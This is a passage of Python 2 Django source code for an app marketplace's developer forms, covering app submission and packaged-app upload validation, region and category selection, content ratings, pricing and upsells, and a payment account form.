geodata.banner_message = self.cleaned_data.get('banner_message')
geodata.save()
uses_flash = self.cleaned_data.get('flash')
af = addon.get_latest_file()
if af is not None:
af.update(uses_flash=bool(uses_flash))
index_webapps.delay([addon.id])
return addon
class BasePreviewFormSet(BaseModelFormSet):
def clean(self):
if any(self.errors):
return
at_least_one = False
for form in self.forms:
if (not form.cleaned_data.get('DELETE') and
form.cleaned_data.get('upload_hash') is not None):
at_least_one = True
if not at_least_one:
raise forms.ValidationError(
_('You must upload at least one screenshot or video.'))
PreviewFormSet = modelformset_factory(Preview, formset=BasePreviewFormSet,
form=PreviewForm, can_delete=True,
extra=1)
class NewManifestForm(happyforms.Form):
manifest = forms.URLField()
def __init__(self, *args, **kwargs):
self.is_standalone = kwargs.pop('is_standalone', False)
super(NewManifestForm, self).__init__(*args, **kwargs)
def clean_manifest(self):
manifest = self.cleaned_data['manifest']
# Skip checking the domain for the standalone validator.
if not self.is_standalone:
verify_app_domain(manifest)
return manifest
class NewPackagedAppForm(happyforms.Form):
upload = forms.FileField()
def __init__(self, *args, **kwargs):
self.max_size = kwargs.pop('max_size', MAX_PACKAGED_APP_SIZE)
self.user = kwargs.pop('user', get_user())
self.addon = kwargs.pop('addon', None)
self.file_upload = None
super(NewPackagedAppForm, self).__init__(*args, **kwargs)
def clean_upload(self):
upload = self.cleaned_data['upload']
errors = []
if upload.size > self.max_size:
errors.append({
'type': 'error',
'message': _('Packaged app too large for submission. Packages '
'must be smaller than %s.' % filesizeformat(
self.max_size)),
'tier': 1,
})
# Immediately raise an error, do not process the rest of the view,
# which would read the file.
raise self.persist_errors(errors, upload)
manifest = None
try:
# Be careful to keep this as in-memory zip reading.
manifest = ZipFile(upload, 'r').read('manifest.webapp')
except Exception as e:
errors.append({
'type': 'error',
'message': _('Error extracting manifest from zip file.'),
'tier': 1,
})
origin = None
if manifest:
try:
origin = WebAppParser.decode_manifest(manifest).get('origin')
except forms.ValidationError as e:
errors.append({
'type': 'error',
'message': ''.join(e.messages),
'tier': 1,
})
if origin:
try:
verify_app_domain(origin, packaged=True, exclude=self.addon)
except forms.ValidationError, e:
errors.append({
'type': 'error',
'message': ''.join(e.messages),
'tier': 1,
})
if errors:
raise self.persist_errors(errors, upload)
# Everything passed validation.
self.file_upload = FileUpload.from_post(
upload, upload.name, upload.size, is_webapp=True)
self.file_upload.user = self.user
self.file_upload.save()
def persist_errors(self, errors, upload):
"""
Persist the error with this into FileUpload (but do not persist
the file contents, which are too large) and return a ValidationError.
"""
validation = {
'errors': len(errors),
'success': False,
'messages': errors,
}
self.file_upload = FileUpload.objects.create(
is_webapp=True, user=self.user,
name=getattr(upload, 'name', ''),
validation=json.dumps(validation))
# Return a ValidationError to be raised by the view.
return forms.ValidationError(' '.join(e['message'] for e in errors))
class AppFormBasic(addons.forms.AddonFormBase):
"""Form to edit basic app info."""
slug = forms.CharField(max_length=30, widget=forms.TextInput)
manifest_url = forms.URLField()
description = TransField(required=True,
label=_lazy(u'Provide a detailed description of your app'),
help_text=_lazy(u'This description will appear on the details page.'),
widget=TransTextarea)
class Meta:
model = Addon
fields = ('slug', 'manifest_url', 'description')
def __init__(self, *args, **kw):
# Force the form to use app_slug if this is a webapp. We want to keep
# this under "slug" so all the js continues to work.
if kw['instance'].is_webapp():
kw.setdefault('initial', {})['slug'] = kw['instance'].app_slug
super(AppFormBasic, self).__init__(*args, **kw)
if self.instance.is_packaged:
# Manifest URL field for packaged apps is empty.
self.fields['manifest_url'].required = False
def _post_clean(self):
# Switch slug to app_slug in cleaned_data and self._meta.fields so
# we can update the app_slug field for webapps.
try:
self._meta.fields = list(self._meta.fields)
slug_idx = self._meta.fields.index('slug')
data = self.cleaned_data
if 'slug' in data:
data['app_slug'] = data.pop('slug')
self._meta.fields[slug_idx] = 'app_slug'
super(AppFormBasic, self)._post_clean()
finally:
self._meta.fields[slug_idx] = 'slug'
def clean_slug(self):
slug = self.cleaned_data['slug']
slug_validator(slug, lower=False)
if slug != self.instance.app_slug:
if Webapp.objects.filter(app_slug=slug).exists():
raise forms.ValidationError(
_('This slug is already in use. Please choose another.'))
if BlacklistedSlug.blocked(slug):
raise forms.ValidationError(_('The slug cannot be "%s". '
'Please choose another.' % slug))
return slug.lower()
def clean_manifest_url(self):
manifest_url = self.cleaned_data['manifest_url']
# Only verify if manifest changed.
if 'manifest_url' in self.changed_data:
# Only Admins can edit the manifest_url.
if not acl.action_allowed(self.request, 'Admin', '%'):
return self.instance.manifest_url
verify_app_domain(manifest_url, exclude=self.instance)
return manifest_url
def save(self, addon, commit=False):
# We ignore `commit`, since we need it to be `False` so we can save
# the ManyToMany fields on our own.
addonform = super(AppFormBasic, self).save(commit=False)
addonform.save()
return addonform
class AppFormDetails(addons.forms.AddonFormBase):
default_locale = forms.TypedChoiceField(required=False,
choices=Addon.LOCALES)
homepage = TransField.adapt(forms.URLField)(required=False)
privacy_policy = TransField(widget=TransTextarea(), required=True,
label=_lazy(u"Please specify your app's Privacy Policy"))
class Meta:
model = Addon
fields = ('default_locale', 'homepage', 'privacy_policy')
def clean(self):
# Make sure we have the required translations in the new locale.
required = ['name', 'description']
data = self.cleaned_data
if not self.errors and 'default_locale' in self.changed_data:
fields = dict((k, getattr(self.instance, k + '_id'))
for k in required)
locale = data['default_locale']
ids = filter(None, fields.values())
qs = (Translation.objects.filter(locale=locale, id__in=ids,
localized_string__isnull=False)
.values_list('id', flat=True))
missing = [k for k, v in fields.items() if v not in qs]
if missing:
raise forms.ValidationError(
_('Before changing your default locale you must have a '
'name and description in that locale. '
'You are missing %s.') % ', '.join(map(repr, missing)))
return data
class AppFormMedia(addons.forms.AddonFormBase):
icon_type = forms.CharField(required=False,
widget=forms.RadioSelect(renderer=IconWidgetRenderer, choices=[]))
icon_upload_hash = forms.CharField(required=False)
unsaved_icon_data = forms.CharField(required=False,
widget=forms.HiddenInput)
class Meta:
model = Addon
fields = ('icon_upload_hash', 'icon_type')
def __init__(self, *args, **kwargs):
super(AppFormMedia, self).__init__(*args, **kwargs)
# Add icons here so we only read the directory when
# AppFormMedia is actually being used.
self.fields['icon_type'].widget.choices = icons()
def save(self, addon, commit=True):
if self.cleaned_data['icon_upload_hash']:
upload_hash = self.cleaned_data['icon_upload_hash']
upload_path = os.path.join(settings.TMP_PATH, 'icon', upload_hash)
dirname = addon.get_icon_dir()
destination = os.path.join(dirname, '%s' % addon.id)
remove_icons(destination)
tasks.resize_icon.delay(upload_path, destination,
amo.ADDON_ICON_SIZES,
set_modified_on=[addon])
return super(AppFormMedia, self).save(commit)
class AppFormSupport(addons.forms.AddonFormBase):
support_url = TransField.adapt(forms.URLField)(required=False)
support_email = TransField.adapt(forms.EmailField)()
class Meta:
model = Addon
fields = ('support_email', 'support_url')
class AppAppealForm(happyforms.Form):
"""
If a developer's app is rejected he can make changes and request
another review.
"""
notes = forms.CharField(
label=_lazy(u'Your comments'),
required=False, widget=forms.Textarea(attrs={'rows': 2}))
def __init__(self, *args, **kw):
self.product = kw.pop('product', None)
super(AppAppealForm, self).__init__(*args, **kw)
def save(self):
version = self.product.versions.latest()
notes = self.cleaned_data['notes']
if notes:
amo.log(amo.LOG.WEBAPP_RESUBMIT, self.product, version,
details={'comments': notes})
else:
amo.log(amo.LOG.WEBAPP_RESUBMIT, self.product, version)
# Mark app and file as pending again.
self.product.update(status=amo.WEBAPPS_UNREVIEWED_STATUS)
version.all_files[0].update(status=amo.WEBAPPS_UNREVIEWED_STATUS)
return version
class RegionForm(forms.Form):
regions = forms.MultipleChoiceField(required=False,
label=_lazy(u'Choose the regions your app will be listed in:'),
choices=[],
widget=forms.CheckboxSelectMultiple,
error_messages={'required':
_lazy(u'You must select at least one region.')})
special_regions = forms.MultipleChoiceField(required=False,
choices=[(x.id, x.name) for x in mkt.regions.SPECIAL_REGIONS],
widget=forms.CheckboxSelectMultiple)
enable_new_regions = forms.BooleanField(required=False,
label=_lazy(u'Enable new regions'))
restricted = forms.TypedChoiceField(required=False,
choices=[(0, _lazy('Make my app available in most regions')),
(1, _lazy('Choose where my app is made available'))],
widget=forms.RadioSelect(attrs={'class': 'choices'}),
initial=0,
coerce=int)
def __init__(self, *args, **kw):
self.product = kw.pop('product', None)
self.request = kw.pop('request', None)
super(RegionForm, self).__init__(*args, **kw)
self.fields['regions'].choices = REGIONS_CHOICES_SORTED_BY_NAME()
# If we have excluded regions, uncheck those.
# Otherwise, default to everything checked.
self.regions_before = self.product.get_region_ids(restofworld=True)
self.initial = {
'regions': sorted(self.regions_before),
'restricted': int(self.product.geodata.restricted),
'enable_new_regions': self.product.enable_new_regions,
}
# The checkboxes for special regions are
#
# - checked ... if an app has not been requested for approval in
# China or the app has been rejected in China.
#
# - unchecked ... if an app has been requested for approval in
# China or the app has been approved in China.
unchecked_statuses = (amo.STATUS_NULL, amo.STATUS_REJECTED)
for region in self.special_region_objs:
if self.product.geodata.get_status(region) in unchecked_statuses:
# If it's rejected in this region, uncheck its checkbox.
if region.id in self.initial['regions']:
self.initial['regions'].remove(region.id)
elif region.id not in self.initial['regions']:
# If it's pending/public, check its checkbox.
self.initial['regions'].append(region.id)
@property
def regions_by_id(self):
return mkt.regions.REGIONS_CHOICES_ID_DICT
@property
def special_region_objs(self):
return mkt.regions.SPECIAL_REGIONS
@property
def special_region_ids(self):
return mkt.regions.SPECIAL_REGION_IDS
@property
def special_region_statuses(self):
"""Returns the null/pending/public status for each region."""
statuses = {}
for region in self.special_region_objs:
statuses[region.id] = self.product.geodata.get_status_slug(region)
return statuses
@property
def special_region_messages(self):
"""Returns the L10n messages for each region's status."""
return self.product.geodata.get_status_messages()
def is_toggling(self):
if not self.request or not hasattr(self.request, 'POST'):
return False
value = self.request.POST.get('toggle-paid')
return value if value in ('free', 'paid') else False
def _product_is_paid(self):
return (self.product.premium_type in amo.ADDON_PREMIUMS
or self.product.premium_type == amo.ADDON_FREE_INAPP)
def clean_regions(self):
regions = self.cleaned_data['regions']
if not self.is_toggling():
if not regions:
raise forms.ValidationError(
_('You must select at least one region.'))
return regions
def save(self):
# Don't save regions if we are toggling.
if self.is_toggling():
return
regions = [int(x) for x in self.cleaned_data['regions']]
special_regions = [
int(x) for x in self.cleaned_data['special_regions']
]
restricted = int(self.cleaned_data['restricted'] or 0)
if restricted:
before = set(self.regions_before)
after = set(regions)
log.info(u'[Webapp:%s] App mark as restricted.' % self.product)
# Add new region exclusions.
to_add = before - after
for region in to_add:
aer, created = self.product.addonexcludedregion.get_or_create(
region=region)
if created:
log.info(u'[Webapp:%s] Excluded from new region (%s).'
% (self.product, region))
# Remove old region exclusions.
to_remove = after - before
for region in to_remove:
self.product.addonexcludedregion.filter(
region=region).delete()
log.info(u'[Webapp:%s] No longer exluded from region (%s).'
% (self.product, region))
else:
self.product.addonexcludedregion.all().delete()
log.info(u'[Webapp:%s] App mark as unrestricted.' % self.product)
self.product.geodata.update(restricted=restricted)
# Toggle region exclusions/statuses for special regions (e.g., China).
toggle_app_for_special_regions(self.request, self.product,
special_regions)
if self.cleaned_data['enable_new_regions']:
self.product.update(enable_new_regions=True)
log.info(u'[Webapp:%s] will be added to future regions.'
% self.product)
else:
self.product.update(enable_new_regions=False)
log.info(u'[Webapp:%s] will not be added to future regions.'
% self.product)
class CategoryForm(happyforms.Form):
categories = forms.ModelMultipleChoiceField(
queryset=Category.objects.filter(type=amo.ADDON_WEBAPP),
widget=CategoriesSelectMultiple)
def __init__(self, *args, **kw):
self.request = kw.pop('request', None)
self.product = kw.pop('product', None)
super(CategoryForm, self).__init__(*args, **kw)
self.cats_before = list(
self.product.categories.values_list('id', flat=True))
self.initial['categories'] = self.cats_before
def max_categories(self):
return amo.MAX_CATEGORIES
def clean_categories(self):
categories = self.cleaned_data['categories']
set_categories = set(categories.values_list('id', flat=True))
total = len(set_categories)
max_cat = amo.MAX_CATEGORIES
if total > max_cat:
# L10n: {0} is the number of categories.
raise forms.ValidationError(ngettext(
'You can have only {0} category.',
'You can have only {0} categories.',
max_cat).format(max_cat))
return categories
def save(self):
after = list(self.cleaned_data['categories']
.values_list('id', flat=True))
before = self.cats_before
# Add new categories.
to_add = set(after) - set(before)
for c in to_add:
self.product.addoncategory_set.create(category_id=c)
# Remove old categories.
to_remove = set(before) - set(after)
self.product.addoncategory_set.filter(
category_id__in=to_remove).delete()
toggle_app_for_special_regions(self.request, self.product)
class DevAgreementForm(happyforms.Form):
read_dev_agreement = forms.BooleanField(label=_lazy(u'Agree'),
widget=forms.HiddenInput)
def __init__(self, *args, **kw):
self.instance = kw.pop('instance')
super(DevAgreementForm, self).__init__(*args, **kw)
def save(self):
self.instance.read_dev_agreement = datetime.now()
self.instance.save()
class DevNewsletterForm(happyforms.Form):
"""Devhub newsletter subscription form."""
email = forms.EmailField(
error_messages={'required':
_lazy(u'Please enter a valid email address.')},
widget=forms.TextInput(attrs={'required': '',
'placeholder':
_lazy(u'Your email address')}))
email_format = forms.ChoiceField(
widget=forms.RadioSelect(),
choices=(('H', 'HTML'), ('T', _lazy(u'Text'))),
initial='H')
privacy = forms.BooleanField(
error_messages={'required':
_lazy(u'You must agree to the Privacy Policy.')})
country = forms.ChoiceField(label=_lazy(u'Country'))
def __init__(self, locale, *args, **kw):
regions = product_details.get_regions(locale)
regions = sorted(regions.iteritems(), key=lambda x: x[1])
super(DevNewsletterForm, self).__init__(*args, **kw)
self.fields['country'].choices = regions
self.fields['country'].initial = 'us'
class AppFormTechnical(addons.forms.AddonFormBase):
flash = forms.BooleanField(required=False)
class Meta:
model = Addon
fields = ('public_stats',)
def __init__(self, *args, **kw):
super(AppFormTechnical, self).__init__(*args, **kw)
self.initial['flash'] = self.instance.uses_flash
def save(self, addon, commit=False):
uses_flash = self.cleaned_data.get('flash')
self.instance = super(AppFormTechnical, self).save(commit=True)
af = self.instance.get_latest_file()
if af is not None:
af.update(uses_flash=bool(uses_flash))
return self.instance
class TransactionFilterForm(happyforms.Form):
app = AddonChoiceField(queryset=None, required=False, label=_lazy(u'App'))
transaction_type = forms.ChoiceField(
required=False, label=_lazy(u'Transaction Type'),
choices=[(None, '')] + amo.MKT_TRANSACTION_CONTRIB_TYPES.items())
transaction_id = forms.CharField(
required=False, label=_lazy(u'Transaction ID'))
current_year = datetime.today().year
years = [current_year - x for x in range(current_year - 2012)]
date_from = forms.DateTimeField(
required=False, widget=SelectDateWidget(years=years),
label=_lazy(u'From'))
date_to = forms.DateTimeField(
required=False, widget=SelectDateWidget(years=years),
label=_lazy(u'To'))
def __init__(self, *args, **kwargs):
self.apps = kwargs.pop('apps', [])
super(TransactionFilterForm, self).__init__(*args, **kwargs)
self.fields['app'].queryset = self.apps
class APIConsumerForm(happyforms.ModelForm):
app_name = forms.CharField(required=True)
redirect_uri = forms.CharField(validators=[URLValidator()],
required=True)
class Meta:
model = Access
fields = ('app_name', 'redirect_uri')
class AppVersionForm(happyforms.ModelForm):
releasenotes = TransField(widget=TransTextarea(), required=False)
approvalnotes = forms.CharField(
widget=TranslationTextarea(attrs={'rows': 4}), required=False)
publish_immediately = forms.BooleanField(required=False)
class Meta:
model = Version
fields = ('releasenotes', 'approvalnotes')
def __init__(self, *args, **kwargs):
super(AppVersionForm, self).__init__(*args, **kwargs)
self.fields['publish_immediately'].initial = (
self.instance.addon.make_public == amo.PUBLIC_IMMEDIATELY)
def save(self, *args, **kwargs):
rval = super(AppVersionForm, self).save(*args, **kwargs)
if self.instance.all_files[0].status == amo.STATUS_PENDING:
# If version is pending, allow changes to make_public, which lives
# on the app itself.
if self.cleaned_data.get('publish_immediately'):
make_public = amo.PUBLIC_IMMEDIATELY
else:
make_public = amo.PUBLIC_WAIT
self.instance.addon.update(make_public=make_public)
return rval
class PreloadTestPlanForm(happyforms.Form):
agree = forms.BooleanField(
widget=forms.CheckboxInput,
label=_lazy(
u'Please consider my app as a candidate to be pre-loaded on a '
u'Firefox OS device. I agree to the terms and conditions outlined '
u'above. I understand that this document is not a commitment to '
u'pre-load my app.'
))
test_plan = forms.FileField(
label=_lazy(u'Upload Your Test Plan (.pdf, .xls under 2.5MB)'),
widget=forms.FileInput(attrs={'class': 'button'}))
def clean(self):
"""Validate test_plan file."""
content_types = ['application/pdf', 'application/vnd.ms-excel']
max_upload_size = 2621440 # 2.5MB
if 'test_plan' not in self.files:
raise forms.ValidationError(_('Test plan required.'))
file = self.files['test_plan']
content_type = file.content_type
if content_type in content_types:
if file._size > max_upload_size:
msg = _('File too large. Keep size under %s. Current size %s.')
msg = msg % (filesizeformat(max_upload_size),
filesizeformat(file._size))
self._errors['test_plan'] = self.error_class([msg])
raise forms.ValidationError(msg)
else:
msg = (_('Invalid file type. Only %s files are supported.') %
', '.join(content_types))
self._errors['test_plan'] = self.error_class([msg])
raise forms.ValidationError(msg)
return self.cleaned_data
class IARCGetAppInfoForm(happyforms.Form):
submission_id = forms.CharField()
security_code = forms.CharField(max_length=10)
def __init__(self, app, *args, **kwargs):
self.app = app
super(IARCGetAppInfoForm, self).__init__(*args, **kwargs)
def clean_submission_id(self):
submission_id = (
# Also allow "subm-1234" since that's what IARC tool displays.
self.cleaned_data['submission_id'].lower().replace('subm-', ''))
if submission_id.isdigit():
return int(submission_id)
raise forms.ValidationError(_('Please enter a valid submission ID.'))
def clean(self):
cleaned_data = super(IARCGetAppInfoForm, self).clean()
app = self.app
iarc_id = cleaned_data.get('submission_id')
if not app or not iarc_id:
return cleaned_data
if (not settings.IARC_ALLOW_CERT_REUSE and
IARCInfo.objects.filter(submission_id=iarc_id)
.exclude(addon=app).exists()):
del cleaned_data['submission_id']
raise forms.ValidationError(
_('This IARC certificate is already being used for another '
'app. Please create a new IARC Ratings Certificate.'))
return cleaned_data
def save(self, *args, **kwargs):
app = self.app
iarc_id = self.cleaned_data['submission_id']
iarc_code = self.cleaned_data['security_code']
# Generate XML.
xml = lib.iarc.utils.render_xml(
'get_app_info.xml',
{'submission_id': iarc_id, 'security_code': iarc_code})
# Process that shizzle.
client = lib.iarc.client.get_iarc_client('services')
resp = client.Get_App_Info(XMLString=xml)
# Handle response.
data = lib.iarc.utils.IARC_XML_Parser().parse_string(resp)
if data.get('rows'):
row = data['rows'][0]
if 'submission_id' not in row:
# [{'ActionStatus': 'No records found. Please try another
# 'criteria.', 'rowId: 1}].
msg = _('Invalid submission ID or security code.')
self._errors['submission_id'] = self.error_class([msg])
log.info('[IARC] Bad GetAppInfo: %s' % row)
raise forms.ValidationError(msg)
# We found a rating, so store the id and code for future use.
app.set_iarc_info(iarc_id, iarc_code)
app.set_descriptors(row.get('descriptors', []))
app.set_interactives(row.get('interactives', []))
app.set_content_ratings(row.get('ratings', {}))
else:
msg = _('Invalid submission ID or security code.')
self._errors['submission_id'] = self.error_class([msg])
log.info('[IARC] Bad GetAppInfo. No rows: %s' % data)
raise forms.ValidationError(msg)
class ContentRatingForm(happyforms.Form):
since = forms.DateTimeField()
########NEW FILE########
__FILENAME__ = forms_payments
from decimal import Decimal
from django import forms
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db.models import Q
from django.forms.formsets import formset_factory, BaseFormSet
import commonware
import happyforms
from curling.lib import HttpClientError
from tower import ugettext as _, ugettext_lazy as _lazy
import amo
from amo.utils import raise_required
from addons.models import Addon, AddonUpsell
from constants.payments import (PAYMENT_METHOD_ALL, PAYMENT_METHOD_CARD,
PAYMENT_METHOD_OPERATOR)
from editors.models import RereviewQueue
from lib.pay_server import client
from mkt.api.forms import SluggableModelChoiceField
from mkt.constants import (BANGO_COUNTRIES, BANGO_OUTPAYMENT_CURRENCIES,
FREE_PLATFORMS, PAID_PLATFORMS)
from mkt.developers.models import AddonPaymentAccount, PaymentAccount
from mkt.site.forms import AddonChoiceField
from mkt.submit.forms import DeviceTypeForm
from mkt.prices.models import AddonPremium, Price
log = commonware.log.getLogger('z.devhub')
def _restore_app_status(app, save=True):
"""
Restore an incomplete app to its former status. The app will be marked
as its previous status or PENDING if it was never reviewed.
"""
log.info('Changing app from incomplete to previous status: %d' % app.pk)
app.status = (app.highest_status if
app.highest_status != amo.STATUS_NULL else
amo.STATUS_PENDING)
if save:
app.save()
class PremiumForm(DeviceTypeForm, happyforms.Form):
"""
The premium details for an addon, which is unfortunately
distributed across a few models.
"""
# This does a nice Yes/No field like the mockup calls for.
allow_inapp = forms.ChoiceField(
choices=((True, _lazy(u'Yes')), (False, _lazy(u'No'))),
widget=forms.RadioSelect, required=False)
# Choices are provided at init by group_tier_choices.
price = forms.ChoiceField(choices=(), label=_lazy(u'App Price'),
required=False)
def __init__(self, *args, **kw):
self.request = kw.pop('request')
self.addon = kw.pop('addon')
self.user = kw.pop('user')
is_packaged = self.addon.is_packaged
kw['initial'] = {
'allow_inapp': self.addon.premium_type in amo.ADDON_INAPPS
}
if self.addon.premium_type == amo.ADDON_FREE_INAPP:
kw['initial']['price'] = 'free'
elif self.addon.premium and self.addon.premium.price:
# If the app has a premium object, set the initial price.
kw['initial']['price'] = self.addon.premium.price.pk
super(PremiumForm, self).__init__(*args, **kw)
self.fields['paid_platforms'].choices = PAID_PLATFORMS(self.request,
is_packaged)
self.fields['free_platforms'].choices = FREE_PLATFORMS(self.request,
is_packaged)
if (self.is_paid() and not self.is_toggling()):
# Require the price field if the app is premium and
# we're not toggling from free <-> paid.
self.fields['price'].required = True
# Get the list of supported devices and put them in the data.
self.device_data = {}
supported_devices = [amo.REVERSE_DEVICE_LOOKUP[dev.id] for dev in
self.addon.device_types]
self.initial.setdefault('free_platforms', [])
self.initial.setdefault('paid_platforms', [])
for platform in set(x[0].split('-', 1)[1] for x in
(FREE_PLATFORMS(self.request, is_packaged) +
PAID_PLATFORMS(self.request, is_packaged))):
supported = platform in supported_devices
self.device_data['free-%s' % platform] = supported
self.device_data['paid-%s' % platform] = supported
if supported:
self.initial['free_platforms'].append('free-%s' % platform)
self.initial['paid_platforms'].append('paid-%s' % platform)
if not self.initial.get('price'):
self.initial['price'] = self._initial_price_id()
self.fields['price'].choices = self.group_tier_choices()
def group_tier_choices(self):
"""Creates tier choices with optgroups based on payment methods"""
price_choices = [
('free', _('Free (with in-app payments)')),
]
card_billed = []
operator_billed = []
card_and_operator_billed = []
for price in Price.objects.active():
choice = (price.pk, unicode(price))
# Special case price tier 0.
if price.price == Decimal('0.00'):
price_choices.append((price.pk, '%s (%s)' %
(unicode(price), _('Promotional Pricing'))))
# Tiers that can only be operator billed.
elif price.method == PAYMENT_METHOD_OPERATOR:
operator_billed.append(choice)
# Tiers that can only be card billed.
elif price.method == PAYMENT_METHOD_CARD:
card_billed.append(choice)
# Tiers that are can generally be billed by either
# operator or card.
elif price.method == PAYMENT_METHOD_ALL:
card_and_operator_billed.append(choice)
if operator_billed:
price_choices.append((_lazy('Only supports carrier billing'),
operator_billed))
if card_billed:
price_choices.append((_lazy('Only supports credit-card billing'),
card_billed))
if card_and_operator_billed:
price_choices.append(
(_lazy('Supports all billing methods'),
card_and_operator_billed))
return price_choices
def _initial_price_id(self):
"""Sets the inital price tier if available."""
try:
return Price.objects.active().get(price='0.99').id
except Price.DoesNotExist:
log.warning('Could not find a price tier 0.99 to set as default.')
return None
def _make_premium(self):
if self.addon.premium:
return self.addon.premium
log.info('New AddonPremium object for addon %s' % self.addon.pk)
self.addon._premium = AddonPremium(addon=self.addon,
price_id=self._initial_price_id())
return self.addon._premium
def is_paid(self):
is_paid = (self.addon.premium_type in amo.ADDON_PREMIUMS
or self.is_free_inapp())
return is_paid
def is_free_inapp(self):
return self.addon.premium_type == amo.ADDON_FREE_INAPP
def is_toggling(self):
value = self.request.POST.get('toggle-paid')
return value if value in ('free', 'paid') else False
def clean(self):
is_toggling = self.is_toggling()
if self.addon.is_packaged:
self._set_packaged_errors()
if self._errors.get('free_platforms'):
return self.cleaned_data
if not is_toggling:
# If a platform wasn't selected, raise an error.
if not self.cleaned_data[
'%s_platforms' % ('paid' if self.is_paid() else 'free')]:
self._add_error('none')
# We want to throw out the user's selections in this case and
# not update the <select> element that goes along with this.
# I.e.: we don't want to re-populate these big chunky
# checkboxes with bad data.
# Also, I'm so, so sorry.
self.data = dict(self.data)
platforms = dict(
free_platforms=self.initial.get('free_platforms', []),
paid_platforms=self.initial.get('paid_platforms', []))
self.data.update(**platforms)
return self.cleaned_data
def clean_price(self):
price_value = self.cleaned_data.get('price')
premium_type = self.cleaned_data.get('premium_type')
if ((premium_type in amo.ADDON_PREMIUMS
or premium_type == amo.ADDON_FREE_INAPP)
and not price_value and not self.is_toggling()):
raise_required()
if not price_value and self.fields['price'].required is False:
return None
# Special case for a free app - in-app payments must be enabled.
# Note: this isn't enforced for tier zero apps.
if price_value == 'free':
if self.cleaned_data.get('allow_inapp') != 'True':
raise ValidationError(_('If app is Free, '
'in-app payments must be enabled'))
return price_value
try:
price = Price.objects.get(pk=price_value, active=True)
except (ValueError, Price.DoesNotExist):
raise ValidationError(_('Not a valid choice'))
return price
def save(self):
toggle = self.is_toggling()
upsell = self.addon.upsold
# is_paid is true for both premium apps and free apps with
# in-app payments.
is_paid = self.is_paid()
if toggle == 'paid' and self.addon.premium_type == amo.ADDON_FREE:
# Toggle free apps to paid by giving them a premium object.
premium = self._make_premium()
premium.price_id = self._initial_price_id()
premium.save()
self.addon.premium_type = amo.ADDON_PREMIUM
self.addon.status = amo.STATUS_NULL
is_paid = True
elif toggle == 'free' and is_paid:
# If the app is paid and we're making it free, remove it as an
# upsell (if an upsell exists).
upsell = self.addon.upsold
if upsell:
log.debug('[1@%s] Removing upsell; switching to free' %
self.addon.pk)
upsell.delete()
log.debug('[1@%s] Removing app payment account' % self.addon.pk)
AddonPaymentAccount.objects.filter(addon=self.addon).delete()
log.debug('[1@%s] Setting app premium_type to FREE' %
self.addon.pk)
self.addon.premium_type = amo.ADDON_FREE
# Remove addonpremium
try:
log.debug('[1@%s] Removing addon premium' % self.addon.pk)
self.addon.addonpremium.delete()
except AddonPremium.DoesNotExist:
pass
if (self.addon.has_incomplete_status() and
self.addon.is_fully_complete()):
_restore_app_status(self.addon, save=False)
is_paid = False
# Right is_paid is both paid apps and free with in-app payments.
elif is_paid:
price = self.cleaned_data.get('price')
# If price is free then we want to make this an app that's
# free with in-app payments.
if price == 'free':
self.addon.premium_type = amo.ADDON_FREE_INAPP
log.debug('[1@%s] Changing to free with in_app'
% self.addon.pk)
# Remove upsell
upsell = self.addon.upsold
if upsell:
log.debug('[1@%s] Removing upsell; switching to free '
'with in_app' % self.addon.pk)
upsell.delete()
# Remove addonpremium
try:
log.debug('[1@%s] Removing addon premium' % self.addon.pk)
self.addon.addonpremium.delete()
except AddonPremium.DoesNotExist:
pass
else:
# The dev is submitting updates for payment data about a paid
# app. This might also happen if he/she is associating a new
# paid app with an existing bank account.
premium = self._make_premium()
self.addon.premium_type = (
amo.ADDON_PREMIUM_INAPP if
self.cleaned_data.get('allow_inapp') == 'True' else
amo.ADDON_PREMIUM)
if price and price != 'free':
log.debug('[1@%s] Updating app price (%s)' %
(self.addon.pk, self.cleaned_data['price']))
premium.price = self.cleaned_data['price']
premium.save()
if not toggle:
# Save the device compatibility information when we're not
# toggling.
super(PremiumForm, self).save(self.addon, is_paid)
log.info('Saving app payment changes for addon %s.' % self.addon.pk)
self.addon.save()
class UpsellForm(happyforms.Form):
upsell_of = AddonChoiceField(queryset=Addon.objects.none(), required=False,
label=_lazy(u'This is a paid upgrade of'),
empty_label=_lazy(u'Not an upgrade'))
def __init__(self, *args, **kw):
self.addon = kw.pop('addon')
self.user = kw.pop('user')
kw.setdefault('initial', {})
if self.addon.upsold:
kw['initial']['upsell_of'] = self.addon.upsold.free
super(UpsellForm, self).__init__(*args, **kw)
self.fields['upsell_of'].queryset = (
self.user.addons.exclude(pk=self.addon.pk,
status=amo.STATUS_DELETED)
.filter(premium_type__in=amo.ADDON_FREES,
type=self.addon.type))
def save(self):
current_upsell = self.addon.upsold
new_upsell_app = self.cleaned_data.get('upsell_of')
if new_upsell_app:
# We're changing the upsell or creating a new one.
if not current_upsell:
# If the upsell is new or we just deleted the old upsell,
# create a new upsell.
log.debug('[1@%s] Creating app upsell' % self.addon.pk)
current_upsell = AddonUpsell(premium=self.addon)
# Set the upsell object to point to the app that we're upselling.
current_upsell.free = new_upsell_app
current_upsell.save()
elif current_upsell:
# We're deleting the upsell.
log.debug('[1@%s] Deleting the app upsell' % self.addon.pk)
current_upsell.delete()
class BangoPaymentAccountForm(happyforms.Form):
bankAccountPayeeName = forms.CharField(
max_length=50, label=_lazy(u'Account Holder Name'))
companyName = forms.CharField(
max_length=255, label=_lazy(u'Company Name'))
vendorName = forms.CharField(
max_length=255, label=_lazy(u'Vendor Name'))
financeEmailAddress = forms.EmailField(
required=True, label=_lazy(u'Financial Email'),
max_length=100)
adminEmailAddress = forms.EmailField(
required=True, label=_lazy(u'Administrative Email'),
max_length=100)
supportEmailAddress = forms.EmailField(
required=True, label=_lazy(u'Support Email'),
max_length=100)
address1 = forms.CharField(
max_length=255, label=_lazy(u'Address'))
address2 = forms.CharField(
max_length=255, required=False, label=_lazy(u'Address 2'))
addressCity = forms.CharField(
max_length=128, label=_lazy(u'City/Municipality'))
addressState = forms.CharField(
max_length=64, label=_lazy(u'State/Province/Region'))
addressZipCode = forms.CharField(
max_length=10, label=_lazy(u'Zip/Postal Code'))
addressPhone = forms.CharField(
max_length=20, label=_lazy(u'Phone'))
countryIso = forms.ChoiceField(
choices=BANGO_COUNTRIES, label=_lazy(u'Country'))
currencyIso = forms.ChoiceField(
choices=BANGO_OUTPAYMENT_CURRENCIES,
label=_lazy(u'I prefer to be paid in'))
vatNumber = forms.CharField(
max_length=17, required=False, label=_lazy(u'VAT Number'))
bankAccountNumber = forms.CharField(
max_length=20, label=_lazy(u'Bank Account Number'))
bankAccountCode = forms.CharField(
